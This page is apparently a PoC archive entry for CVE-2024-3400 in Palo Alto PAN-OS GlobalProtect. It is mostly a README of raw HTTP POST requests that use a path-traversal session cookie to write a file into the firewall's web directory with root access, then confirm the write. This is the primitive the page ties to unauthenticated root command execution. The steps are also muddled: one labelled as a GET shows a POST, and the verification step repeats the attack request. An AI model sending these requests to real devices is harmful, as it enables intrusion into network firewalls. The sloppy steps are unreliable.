Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-3400 PoC — PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect

Source
Associated Vulnerability
Title:PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect (CVE-2024-3400)
Description:A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Readme
#Steps :


----------------------------------------------------------------------------------------------
#1. Check whether file (0xr2r.txt) is present on device by running below get request or We can verify same by openinig 

https://domain.com/global-protect/portal/images/0xr2r.txt  Url in browser 
if you get 404 response that means file is not present.

-------------------------------------------------------------------------------------------------
```


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```



-------------------------------------------------------------------------------------------------


#2.now put file (0xr2r.txt) on device by running below post request . this will create file on device under given path with root assess.



-------------------------------------------------------------------------------------------------
```

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r

```

-----------------------------------------------------------------------------------------------------------------------

#3. now again if you try to access the files you should receive 403 insted 404. this proves file (0xr2r.txt)  is present on device
with root access. 


-----------------------------------------------------------------------------------------------------------------------

```

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
```

File Snapshot

[4.0K] /data/pocs/8dd5823ba502bdca0fafb2407477b0a8f1b3f1e8 ├── [2.1K] exploit.txt └── [2.1K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →